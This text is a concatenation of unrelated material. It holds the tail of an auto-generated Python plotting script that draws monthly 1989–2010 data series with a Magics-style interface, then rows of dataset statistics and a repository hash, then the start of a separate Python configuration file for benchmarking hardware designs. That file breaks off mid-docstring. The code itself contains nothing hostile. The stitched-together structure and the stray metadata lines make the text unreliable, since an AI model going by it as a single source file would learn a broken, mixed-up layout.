4.05729795e+00, 4.05123438e+00, 4.05123438e+00,
4.05123438e+00, 4.03350551e+00, 4.06037765e+00,
4.07072885e+00, 4.07982843e+00, 4.04289500e+00,
3.99468397e+00, 4.01932830e+00, 3.98235692e+00,
3.97575989e+00, 3.98193839e+00, 3.98831627e+00,
3.98089186e+00, 3.94406305e+00, 3.91908259e+00,
3.86916119e+00, 1.70000000e+38, 1.70000000e+38,
1.70000000e+38, 1.70000000e+38, 1.70000000e+38])) #264
mpp.setc('graph_missing_data_colour','red')
mpp.seti('graph_symbol_marker_index',15)
mpp.setc('graph_symbol_colour','red')
mpp.setc('graph_missing_data_style','dash')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','dash')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
# Plot the "brick" monthly series (1989-01 .. 2010-12) as a solid curve with
# symbol marker 1.  Magics interprets 1.7e38 as the missing-data sentinel; the
# first six months (Jan-Jun 1989) and last five (Aug-Dec 2010) are missing.
_MISSING = 1.70000000e+38
# 264 date labels: the first of every month from 1989-01-01 to 2010-12-01.
_dates = ['%04d-%02d-01' % (_year, _month)
          for _year in range(1989, 2011) for _month in range(1, 13)]
# 253 data points padded with the sentinel to 264 entries (one per month).
_values = [_MISSING] * 6 + [
    6.99559385e+00, 6.90983598e+00, 6.82300032e+00,
    6.83245929e+00, 6.77956488e+00, 6.76479859e+00,
    6.75172817e+00, 6.75172817e+00, 6.73337459e+00,
    6.72575894e+00, 6.69950247e+00, 6.69950247e+00,
    6.67957084e+00, 6.69850730e+00, 6.71739037e+00,
    6.67957084e+00, 6.67957084e+00, 6.67957084e+00,
    6.67314269e+00, 6.67314269e+00, 6.69807186e+00,
    6.65463498e+00, 6.66333250e+00, 6.58989125e+00,
    6.59993687e+00, 6.59027061e+00, 6.56156739e+00,
    6.54299880e+00, 6.51715684e+00, 6.52476053e+00,
    6.55883628e+00, 6.57127588e+00, 6.55832804e+00,
    6.58723513e+00, 6.52808037e+00, 6.58299577e+00,
    6.58299577e+00, 6.71739037e+00, 6.76467540e+00,
    6.82947045e+00, 6.83757998e+00, 6.83032454e+00,
    6.79760987e+00, 6.77974926e+00, 6.78595363e+00,
    6.77876587e+00, 6.82727374e+00, 6.84580163e+00,
    6.78932986e+00, 6.64692912e+00, 6.68742601e+00,
    6.65839070e+00, 6.65839070e+00, 6.62979386e+00,
    6.65638791e+00, 6.66839561e+00, 6.65588712e+00,
    6.65588712e+00, 6.59046028e+00, 6.57121247e+00,
    6.59020738e+00, 6.61916410e+00, 6.54872761e+00,
    6.55845510e+00, 6.54166136e+00, 6.55591336e+00,
    6.54898211e+00, 6.54898211e+00, 6.53675506e+00,
    6.54420864e+00, 6.55997967e+00, 6.60902161e+00,
    6.52737824e+00, 6.54751861e+00, 6.55724790e+00,
    6.55724790e+00, 6.52514368e+00, 6.52514368e+00,
    6.48594635e+00, 6.45600496e+00, 6.46213329e+00,
    6.43984989e+00, 6.45639218e+00, 6.39648341e+00,
    6.48960708e+00, 6.48960708e+00, 6.43234017e+00,
    6.34724350e+00, 6.36350270e+00, 6.36350270e+00,
    6.38291992e+00, 6.37723817e+00, 6.37723817e+00,
    6.39973958e+00, 6.39133528e+00, 6.39133528e+00,
    6.39133528e+00, 6.35052491e+00, 6.38872705e+00,
    6.42514591e+00, 6.41703462e+00, 6.40969318e+00,
    6.38416009e+00, 6.38416009e+00, 6.36009696e+00,
    6.35242736e+00, 6.37815282e+00, 6.31334565e+00,
    6.34435445e+00, 6.37482026e+00, 6.42527561e+00,
    6.39778608e+00, 6.45723109e+00, 6.46451854e+00,
    6.48973549e+00, 6.50685536e+00, 6.51837147e+00,
    6.52584605e+00, 6.52584605e+00, 6.62690224e+00,
    6.56854880e+00, 6.51984151e+00, 6.39654855e+00,
    6.37011251e+00, 6.29371379e+00, 6.27162924e+00,
    6.25832779e+00, 6.24633226e+00, 6.22280751e+00,
    6.25132713e+00, 6.19523277e+00, 6.02864375e+00,
    5.97449123e+00, 5.89892132e+00, 5.93050665e+00,
    5.90077037e+00, 5.90077037e+00, 5.87645533e+00,
    5.86894756e+00, 5.85561114e+00, 5.87583650e+00,
    5.83766506e+00, 5.83766506e+00, 5.82887925e+00,
    5.80940330e+00, 5.80652578e+00, 5.81460302e+00,
    5.87994756e+00, 5.89197901e+00, 5.89633078e+00,
    5.87340830e+00, 5.89189486e+00, 5.88188391e+00,
    5.86981189e+00, 5.81316322e+00, 5.79508772e+00,
    5.80772044e+00, 5.80390242e+00, 5.71488918e+00,
    5.58455174e+00, 5.54105257e+00, 5.56268738e+00,
    5.55763439e+00, 5.54251666e+00, 5.53687145e+00,
    5.54555022e+00, 5.59948374e+00, 5.61497025e+00,
    5.58562685e+00, 5.56643431e+00, 5.54859114e+00,
    5.58939397e+00, 5.57848098e+00, 5.52037816e+00,
    5.52170339e+00, 5.48657832e+00, 5.48400173e+00,
    5.45494119e+00, 5.42723763e+00, 5.43753927e+00,
    5.40414039e+00, 5.37206276e+00, 5.35832841e+00,
    5.32288064e+00, 5.28115123e+00, 5.27896139e+00,
    5.26009822e+00, 5.26665533e+00, 5.24667831e+00,
    5.22665285e+00, 5.19755471e+00, 5.14539762e+00,
    5.10910543e+00, 5.09919520e+00, 5.09540234e+00,
    5.11411038e+00, 5.09239629e+00, 5.07833880e+00,
    5.06902604e+00, 5.09127931e+00, 5.06867011e+00,
    5.06328698e+00, 5.05024752e+00, 5.07868093e+00,
    5.08640672e+00, 5.07177566e+00, 5.07177566e+00,
    5.03915006e+00, 5.04553598e+00, 5.05515661e+00,
    5.04803427e+00, 5.00038499e+00, 5.01064450e+00,
    5.04298883e+00, 5.01916962e+00, 5.04089368e+00,
    5.00241215e+00, 4.96303243e+00, 4.95356896e+00,
    4.88367875e+00, 4.87648066e+00, 4.84785051e+00,
    4.85519590e+00, 4.87030987e+00, 4.86686944e+00,
    4.80200479e+00, 4.80631096e+00, 4.66400579e+00,
    4.65415048e+00, 4.62165014e+00, 4.56296504e+00,
    4.63944860e+00, 4.59232875e+00, 4.58853916e+00,
    4.56834945e+00, 4.56052811e+00, 4.54877090e+00,
    4.54803529e+00, 4.52919971e+00, 4.58486823e+00,
    4.56630321e+00, 4.57292211e+00, 4.56738620e+00,
    4.51311607e+00, 4.53472620e+00, 4.51908914e+00,
    4.51041480e+00, 4.50783485e+00, 4.50912501e+00,
    4.50986696e+00, 4.48412756e+00, 4.48802109e+00,
    4.48314900e+00,
] + [_MISSING] * 5  # 264 values in total
mpp.setc('graph_line_colour', 'brick')
mpp.set1c('graph_curve_date_x_values', _dates)
mpp.setc('graph_missing_data_mode', 'ignore')
mpp.setc('graph_symbol', 'on')
mpp.seti('graph_missing_data_thickness', 7)
mpp.set1r('graph_curve_y_values', array(_values))
mpp.setc('graph_missing_data_colour', 'brick')
mpp.seti('graph_symbol_marker_index', 1)
mpp.setc('graph_symbol_colour', 'brick')
mpp.setc('graph_missing_data_style', 'solid')
mpp.setr('graph_symbol_height', 0.4)
mpp.setc('graph_type', 'curve')
mpp.setc('graph_line_style', 'solid')
mpp.seti('graph_line_thickness', 7)
mpp.setc('subpage_map_projection', 'none')
mpp.graph()
# Restore every graph parameter touched above to its Magics default.
for _param in ('graph_line_colour', 'graph_curve_date_x_values',
               'graph_missing_data_mode', 'graph_symbol',
               'graph_missing_data_thickness', 'graph_curve_y_values',
               'graph_missing_data_colour', 'graph_symbol_marker_index',
               'graph_symbol_colour', 'graph_missing_data_style',
               'graph_symbol_height', 'graph_type',
               'graph_line_style', 'graph_line_thickness'):
    mpp.reset(_param)
# Query the page geometry twice, exactly as the generator emitted it
# (expected: x/y position 0.0, x length 29.7, y length 21.0).
for _ in range(2):
    for _param in ('page_x_position', 'page_y_position',
                   'page_x_length', 'page_y_length'):
        mpp.enqr(_param)
# Plot the "blue" monthly series (1989-01 .. 2010-12) as a dotted curve with
# symbol marker 18.  Magics interprets 1.7e38 as the missing-data sentinel; the
# first six months (Jan-Jun 1989) and last five (Aug-Dec 2010) are missing.
_MISSING = 1.70000000e+38
# 264 date labels: the first of every month from 1989-01-01 to 2010-12-01.
_dates = ['%04d-%02d-01' % (_year, _month)
          for _year in range(1989, 2011) for _month in range(1, 13)]
# 253 data points padded with the sentinel to 264 entries (one per month).
_values = [_MISSING] * 6 + [
    6.88648215e+00, 6.87597927e+00, 6.84517083e+00,
    6.94537125e+00, 6.98296629e+00, 7.01517835e+00,
    7.01517835e+00, 7.00876075e+00, 7.01543752e+00,
    6.92230694e+00, 6.94700175e+00, 7.02240462e+00,
    7.01201350e+00, 7.03100277e+00, 7.07737004e+00,
    7.01320184e+00, 7.03100277e+00, 7.03100277e+00,
    7.02454032e+00, 7.03639349e+00, 7.04260842e+00,
    7.07094996e+00, 7.13132760e+00, 7.05708863e+00,
    7.09900228e+00, 7.12799645e+00, 7.12799645e+00,
    7.17257508e+00, 7.12974988e+00, 7.10780088e+00,
    7.12068583e+00, 7.09771090e+00, 7.07954801e+00,
    7.10193636e+00, 7.03307661e+00, 7.05106375e+00,
    6.98838322e+00, 6.99845221e+00, 7.05821035e+00,
    7.08666588e+00, 7.04627561e+00, 7.01830939e+00,
    6.98647503e+00, 6.99213844e+00, 6.99213844e+00,
    6.92694016e+00, 6.89462351e+00, 6.90398436e+00,
    6.82532051e+00, 6.80477773e+00, 6.80477773e+00,
    6.76547609e+00, 6.81627953e+00, 6.83044654e+00,
    6.84312307e+00, 6.83166646e+00, 6.81970185e+00,
    6.83361788e+00, 6.84160069e+00, 6.81358936e+00,
    6.83264224e+00, 6.79301111e+00, 6.62727948e+00,
    6.54357191e+00, 6.46574306e+00, 6.41547608e+00,
    6.39537593e+00, 6.38363794e+00, 6.36540127e+00,
    6.32896779e+00, 6.29517011e+00, 6.26591308e+00,
    6.13038879e+00, 6.07817133e+00, 6.12766949e+00,
    6.18614042e+00, 6.15318346e+00, 6.17488192e+00,
    6.14891589e+00, 6.14891589e+00, 6.16137160e+00,
    6.16137160e+00, 6.21389572e+00, 6.21389572e+00,
    6.24973333e+00, 6.29013778e+00, 6.22347706e+00,
    6.15609454e+00, 6.16414363e+00, 6.14952573e+00,
    6.18230000e+00, 6.18230000e+00, 6.18869938e+00,
    6.19589918e+00, 6.16028950e+00, 6.11310069e+00,
    6.10375567e+00, 6.02238878e+00, 6.02238878e+00,
    6.01304138e+00, 6.01304138e+00, 6.00576112e+00,
    5.97201808e+00, 5.96000559e+00, 5.94046856e+00,
    5.98825239e+00, 5.96210254e+00, 5.97152968e+00,
    5.99075677e+00, 6.01047696e+00, 6.03931563e+00,
    6.02107410e+00, 6.00472037e+00, 6.01200189e+00,
    6.02171418e+00, 6.03239104e+00, 6.02381731e+00,
    5.98544693e+00, 5.98544693e+00, 5.97045853e+00,
    5.89893634e+00, 5.86215475e+00, 5.82567020e+00,
    5.80193071e+00, 5.79448660e+00, 5.77951050e+00,
    5.75573989e+00, 5.72975130e+00, 5.71674077e+00,
    5.66802067e+00, 5.61744011e+00, 5.53677779e+00,
    5.57041590e+00, 5.56127309e+00, 5.55125436e+00,
    5.52645456e+00, 5.51453534e+00, 5.50388348e+00,
    5.48459053e+00, 5.49313511e+00, 5.49000531e+00,
    5.50051437e+00, 5.46746285e+00, 5.49446540e+00,
    5.44069389e+00, 5.36152264e+00, 5.28257040e+00,
    5.27229631e+00, 5.27849410e+00, 5.25198772e+00,
    5.25459561e+00, 5.26922907e+00, 5.26987824e+00,
    5.28113466e+00, 5.28113466e+00, 5.22015086e+00,
    5.22015086e+00, 5.20242251e+00, 5.18226141e+00,
    5.18131981e+00, 5.12302726e+00, 5.11122376e+00,
    5.09870899e+00, 5.06730944e+00, 5.05474859e+00,
    5.02750021e+00, 5.05801015e+00, 5.08257235e+00,
    5.10463596e+00, 5.09626170e+00, 5.09079398e+00,
    5.06090078e+00, 5.06748294e+00, 5.07042240e+00,
    5.07964074e+00, 5.06086537e+00, 5.06673794e+00,
    5.05809170e+00, 5.05095618e+00, 5.04536999e+00,
    5.00142896e+00, 5.03528384e+00, 5.03162830e+00,
    5.01007818e+00, 4.99930912e+00, 4.98393586e+00,
    4.96995892e+00, 4.97353915e+00, 4.96493874e+00,
    4.94562012e+00, 4.91659265e+00, 4.89695909e+00,
    4.87465725e+00, 4.84751053e+00, 4.84845680e+00,
    4.86694976e+00, 4.82385738e+00, 4.82238185e+00,
    4.82171391e+00, 4.84443495e+00, 4.82576678e+00,
    4.82731378e+00, 4.80751211e+00, 4.80040529e+00,
    4.79724826e+00, 4.72437586e+00, 4.69333183e+00,
    4.62879721e+00, 4.66829344e+00, 4.65685614e+00,
    4.64001078e+00, 4.58418923e+00, 4.57855376e+00,
    4.53387452e+00, 4.54623104e+00, 4.55113630e+00,
    4.50058237e+00, 4.51950311e+00, 4.51662854e+00,
    4.50776367e+00, 4.47850421e+00, 4.45915911e+00,
    4.45378865e+00, 4.46652083e+00, 4.44948686e+00,
    4.44433816e+00, 4.47608646e+00, 4.41359831e+00,
    4.44079385e+00, 4.42343193e+00, 4.38483656e+00,
    4.41651352e+00, 4.39596975e+00, 4.40337560e+00,
    4.39674690e+00, 4.39296976e+00, 4.39420262e+00,
    4.41633804e+00, 4.38862640e+00, 4.39222514e+00,
    4.39122041e+00, 4.35610491e+00, 4.32352962e+00,
    4.25909713e+00, 4.25744935e+00, 4.22511637e+00,
    4.21577296e+00, 4.20999604e+00, 4.21521846e+00,
    4.17254219e+00, 4.11995146e+00, 4.11420709e+00,
    4.06678825e+00,
] + [_MISSING] * 5  # 264 values in total
mpp.setc('graph_line_colour', 'blue')
mpp.set1c('graph_curve_date_x_values', _dates)
mpp.setc('graph_missing_data_mode', 'ignore')
mpp.setc('graph_symbol', 'on')
mpp.seti('graph_missing_data_thickness', 7)
mpp.set1r('graph_curve_y_values', array(_values))
mpp.setc('graph_missing_data_colour', 'blue')
mpp.seti('graph_symbol_marker_index', 18)
mpp.setc('graph_symbol_colour', 'blue')
mpp.setc('graph_missing_data_style', 'dot')
mpp.setr('graph_symbol_height', 0.4)
mpp.setc('graph_type', 'curve')
mpp.setc('graph_line_style', 'dot')
mpp.seti('graph_line_thickness', 7)
mpp.setc('subpage_map_projection', 'none')
mpp.graph()
# Restore every graph parameter touched above to its Magics default.
for _param in ('graph_line_colour', 'graph_curve_date_x_values',
               'graph_missing_data_mode', 'graph_symbol',
               'graph_missing_data_thickness', 'graph_curve_y_values',
               'graph_missing_data_colour', 'graph_symbol_marker_index',
               'graph_symbol_colour', 'graph_missing_data_style',
               'graph_symbol_height', 'graph_type',
               'graph_line_style', 'graph_line_thickness'):
    mpp.reset(_param)
# Query the page geometry twice, exactly as the generator emitted it
# (expected: x/y position 0.0, x length 29.7, y length 21.0).
for _ in range(2):
    for _param in ('page_x_position', 'page_y_position',
                   'page_x_length', 'page_y_length'):
        mpp.enqr(_param)
mpp.setc('graph_line_colour','evergreen')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', 
'2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 1.70000000e+38, 1.70000000e+38, 1.70000000e+38,
1.70000000e+38, 1.70000000e+38, 1.70000000e+38,
6.72383819e+00, 6.69570758e+00, 6.55133574e+00,
6.55133574e+00, 6.52514368e+00, 6.53261050e+00,
6.52590990e+00, 6.51971370e+00, 6.50032050e+00,
6.49268820e+00, 6.47520913e+00, 6.48478990e+00,
6.51459899e+00, 6.55337063e+00, 6.61759020e+00,
6.59014416e+00, 6.59014416e+00, 6.58274259e+00,
6.58938540e+00, 6.57748686e+00, 6.58375526e+00,
6.56188489e+00, 6.56188489e+00, 6.52469667e+00,
6.54509995e+00, 6.49685822e+00, 6.49685822e+00,
6.50602285e+00, 6.49749952e+00, 6.48286202e+00,
6.46947963e+00, 6.47546652e+00, 6.46284251e+00,
6.51632565e+00, 6.48299057e+00, 6.48299057e+00,
6.45226059e+00, 6.51088832e+00, 6.53056914e+00,
6.59766373e+00, 6.58122329e+00, 6.58837360e+00,
6.57571289e+00, 6.56981735e+00, 6.55209890e+00,
6.50615094e+00, 6.52252507e+00, 6.52252507e+00,
6.52252507e+00, 6.48305484e+00, 6.50333248e+00,
6.42598890e+00, 6.44282547e+00, 6.44282547e+00,
6.45574679e+00, 6.46786930e+00, 6.46213329e+00,
6.44767400e+00, 6.43933226e+00, 6.45794085e+00,
6.44793249e+00, 6.46754719e+00, 6.40774271e+00,
6.49551127e+00, 6.49551127e+00, 6.47411513e+00,
6.48074070e+00, 6.45142103e+00, 6.45716656e+00,
6.46432518e+00, 6.48106216e+00, 6.48106216e+00,
6.35380463e+00, 6.31433554e+00, 6.28556547e+00,
6.14857707e+00, 6.07309641e+00, 6.07309641e+00,
6.02633111e+00, 6.02633111e+00, 6.02017442e+00,
6.00492853e+00, 5.96070466e+00, 5.99186949e+00,
6.07577156e+00, 6.07577156e+00, 6.04710675e+00,
6.09412285e+00, 6.14315337e+00, 6.14315337e+00,
6.18209781e+00, 6.17636625e+00, 6.20114237e+00,
6.19394866e+00, 6.23651879e+00, 6.15907190e+00,
6.13038879e+00, 6.08228301e+00, 6.06389589e+00,
6.03517467e+00, 6.01802847e+00, 6.01061561e+00,
5.98999165e+00, 6.01442710e+00, 6.01442710e+00,
6.08570730e+00, 6.05055094e+00, 5.98804364e+00,
6.01740531e+00, 6.05605757e+00, 6.12263560e+00,
6.08659730e+00, 6.05419964e+00, 6.05419964e+00,
6.05419964e+00, 6.04179885e+00, 6.01636657e+00,
5.94425493e+00, 5.91051323e+00, 5.98337976e+00,
5.92543951e+00, 5.92543951e+00, 5.84729282e+00,
5.83823603e+00, 5.84643766e+00, 5.83894968e+00,
5.83894968e+00, 5.83273806e+00, 5.82651983e+00,
5.87204471e+00, 5.86313599e+00, 5.77242662e+00,
5.78289012e+00, 5.68658709e+00, 5.74028824e+00,
5.72061662e+00, 5.75862989e+00, 5.75049405e+00,
5.70103659e+00, 5.66865384e+00, 5.63608504e+00,
5.56409621e+00, 5.53104873e+00, 5.52207690e+00,
5.47319224e+00, 5.45427967e+00, 5.39251024e+00,
5.40200580e+00, 5.35591573e+00, 5.31805102e+00,
5.41521426e+00, 5.42829288e+00, 5.42829288e+00,
5.44434653e+00, 5.45327258e+00, 5.42443964e+00,
5.44551525e+00, 5.46617699e+00, 5.44518136e+00,
5.42477482e+00, 5.37891506e+00, 5.37891506e+00,
5.27154310e+00, 5.24745970e+00, 5.24745970e+00,
5.25531477e+00, 5.28165063e+00, 5.30879773e+00,
5.28898226e+00, 5.29897789e+00, 5.29897789e+00,
5.31812937e+00, 5.30212222e+00, 5.29496616e+00,
5.30117911e+00, 5.29016383e+00, 5.29016383e+00,
5.25983206e+00, 5.22486044e+00, 5.21552171e+00,
5.23561521e+00, 5.21552171e+00, 5.22549838e+00,
5.16873614e+00, 5.16873614e+00, 5.16155661e+00,
5.14894811e+00, 5.14894811e+00, 5.13695760e+00,
5.13695760e+00, 5.11183268e+00, 5.06639254e+00,
4.97753286e+00, 4.89923463e+00, 4.81828116e+00,
4.80867272e+00, 4.77528359e+00, 4.75298152e+00,
4.73998945e+00, 4.75228015e+00, 4.73409618e+00,
4.72608012e+00, 4.70876842e+00, 4.73761543e+00,
4.73761543e+00, 4.72819557e+00, 4.73796722e+00,
4.70053188e+00, 4.70053188e+00, 4.71540030e+00,
4.72184639e+00, 4.69219210e+00, 4.71053783e+00,
4.66574396e+00, 4.66574396e+00, 4.63644979e+00,
4.63644979e+00, 4.62700407e+00, 4.60715024e+00,
4.61645607e+00, 4.62484234e+00, 4.60968184e+00,
4.62340062e+00, 4.64713173e+00, 4.64713173e+00,
4.65420956e+00, 4.67172345e+00, 4.65313514e+00,
4.68339264e+00, 4.68339264e+00, 4.64623503e+00,
4.67493315e+00, 4.65053760e+00, 4.65796808e+00,
4.63779761e+00, 4.64417197e+00, 4.65743134e+00,
4.65743134e+00, 4.63986350e+00, 4.63986350e+00,
4.60932027e+00, 4.61880215e+00, 4.63716868e+00,
4.58975308e+00, 4.63177432e+00, 4.60986262e+00,
4.60986262e+00, 4.60986262e+00, 4.57766316e+00,
4.56344168e+00, 4.52170690e+00, 4.52170690e+00,
4.47306755e+00, 1.70000000e+38, 1.70000000e+38,
1.70000000e+38, 1.70000000e+38, 1.70000000e+38])) #264
# NOTE(review): tail of an auto-generated plotting script. `mpp` looks like a
# Magics-style plotting interface (setc/seti/setr/reset/enqr/graph/finalize)
# -- confirm against the tool that produced this file.
# Style the curve: dashed 'evergreen' line and symbols, plotted as a plain
# (non-map) graph.
mpp.setc('graph_missing_data_colour','evergreen')
mpp.seti('graph_symbol_marker_index',2)
mpp.setc('graph_symbol_colour','evergreen')
mpp.setc('graph_missing_data_style','chain_dash')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','chain_dash')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
# Draw the curve with the parameters configured above.
mpp.graph()
# Return every graph_* parameter touched above to its default so the next
# plot starts from a clean state.
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
# Query page geometry; the trailing comments record the values observed when
# this script was generated.
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
# Flush output and close the plotting session.
mpp.finalize()
| 73.962243
| 3,735
| 0.615513
| 24,017
| 133,206
| 3.33622
| 0.051922
| 0.023139
| 0.032948
| 0.023363
| 0.839852
| 0.748084
| 0.734393
| 0.701046
| 0.62086
| 0.617889
| 0
| 0.502848
| 0.153867
| 133,206
| 1,800
| 3,736
| 74.003333
| 0.208056
| 0.009354
| 0
| 0.466518
| 0
| 0.001116
| 0.365262
| 0.039514
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.001116
| 0
| 0.001116
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
772e425c00d75fd04b6522afd3dda679e78479df
| 24,722
|
py
|
Python
|
auto_framework/design_cfg.py
|
KULeuven-MICAS/PSMA-benchmark
|
94913e3b2b6a1939d7c325384417268566cfdc47
|
[
"Apache-2.0"
] | 1
|
2022-02-15T09:30:07.000Z
|
2022-02-15T09:30:07.000Z
|
auto_framework/design_cfg.py
|
KULeuven-MICAS/PSMA-benchmark
|
94913e3b2b6a1939d7c325384417268566cfdc47
|
[
"Apache-2.0"
] | null | null | null |
auto_framework/design_cfg.py
|
KULeuven-MICAS/PSMA-benchmark
|
94913e3b2b6a1939d7c325384417268566cfdc47
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# Copyright 2021 MICAS, KU LEUVEN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------
# Author: Ehab Ibrahim
# Function: Design configuration dictionary which holds
# RTL parameters for all benchmarked designs
# -----------------------------------------------------
# Two-bit mode codes swept by the benchmark at every precision level.
_MODES = ("00", "10", "11")

# Configurations that correspond to designs published in the literature keep
# their well-known names instead of the systematic one.
# Key: (name prefix, L4_MODE, L3_MODE, two-bit L2 code, DVAFS).
_NAMED_DESIGNS = {
    ("BG_L2", "00", "11", "11", "0"): "BITFUSION",
    ("BG_L3", "00", "11", "11", "0"): "BITBLADE",
    ("BG_BS", "00", "00", "11", "0"): "LOOM",
}


def _design_name(prefix, l4, l3, l2, dvafs):
    """Return the design's key: its literature name if one exists, otherwise
